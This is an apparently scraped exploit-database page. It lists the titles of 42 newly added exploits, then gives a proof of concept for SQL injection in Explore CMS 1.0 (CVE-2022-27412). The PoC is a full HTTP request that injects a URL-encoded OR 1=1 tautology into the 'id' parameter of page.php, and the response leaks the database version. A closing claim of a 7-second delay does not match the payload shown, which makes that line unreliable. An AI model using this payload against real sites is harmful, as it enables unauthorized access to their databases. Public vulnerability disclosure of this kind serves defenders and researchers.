be24992411
42 changes to exploits/shellcodes UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path TCQ - ITeCProteccioAppServer.exe - Unquoted Service Path Wondershare Dr.Fone 11.4.10 - Insecure File Permissions ExifTool 12.23 - Arbitrary Code Execution Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService) Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService) Prime95 Version 30.7 build 9 - Remote Code Execution (RCE) Akka HTTP 10.1.14 - Denial of Service USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor Bookeen Notea - Directory Traversal SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE) ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure DLINK DIR850 - Insecure Access Control DLINK DIR850 - Open Redirect Apache CouchDB 3.2.1 - Remote Code Execution (RCE) Tenda HG6 v3.3.0 - Remote Command Injection Google Chrome 78.0.3904.70 - Remote Code Execution PyScript - Read Remote Python Source Code DLINK DAP-1620 A1 v1.01 - Directory Traversal Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated) ImpressCMS v1.4.4 - Unrestricted File Upload Microfinance Management System 1.0 - 'customer_number' SQLi WebTareas 2.4 - Blind SQLi (Authenticated) WordPress Plugin Advanced Uploader 4.2 - Arbitrary File Upload (Authenticated) Magento eCommerce CE v2.3.5-p2 - Blind SQLi Bitrix24 - Remote Code Execution (RCE) (Authenticated) CSZ CMS 1.3.0 - 'Multiple' Blind SQLi Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS) Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS) e107 CMS v3.2.1 - Multiple Vulnerabilities Anuko Time Tracker - SQLi (Authenticated) TLR-2005KSH - Arbitrary File Upload Explore CMS 1.0 - SQL Injection Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated) PHProjekt PhpSimplyGest v1.3. - Stored Cross-Site Scripting (XSS) Beehive Forum - Account Takeover MyBB 1.8.29 - MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated) WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF) Joomla Plugin SexyPolling 2.1.7 - SQLi WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
42 lines
No EOL
1.3 KiB
Text
42 lines
No EOL
1.3 KiB
Text
# Exploit Title: Explore CMS 1.0 - SQL Injection
|
|
# Date: 19/03/2022
|
|
# Exploit Author: Sajibe Kanti
|
|
# Vendor Name : EXPLORE IT
|
|
# Vendor Homepage: https://exploreit.com.bd
|
|
# CVE: CVE-2022-27412
|
|
|
|
# POC
|
|
|
|
# SQL Injection
|
|
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
|
|
explore CMS is vulnerable to the SQL Injection in 'id' parameter of the 'page' page.
|
|
|
|
#Steps to reproduce
|
|
|
|
Following URL is vulnerable to SQL Injection in the 'id' field.
|
|
|
|
GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1
|
|
Host: REDACTED
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-us,en;q=0.5
|
|
Cache-Control: no-cache
|
|
Cookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320
|
|
Referer: REDACTED
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36
|
|
(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
|
|
|
|
|
|
HTTP/1.1 200 OK
|
|
content-encoding:
|
|
server: LiteSpeed
|
|
Connection: Keep-Alive
|
|
Keep-Alive: timeout=5, max=100
|
|
content-type: text/html; charset=UTF-8
|
|
transfer-encoding: chunked
|
|
date: Thu, 17 Mar 2022 07:27:21 GMT
|
|
vary: Accept-Encoding
|
|
|
|
10.3.34-MariaDB
|
|
|
|
Server accepts the payload and the response get delayed by 7 seconds. |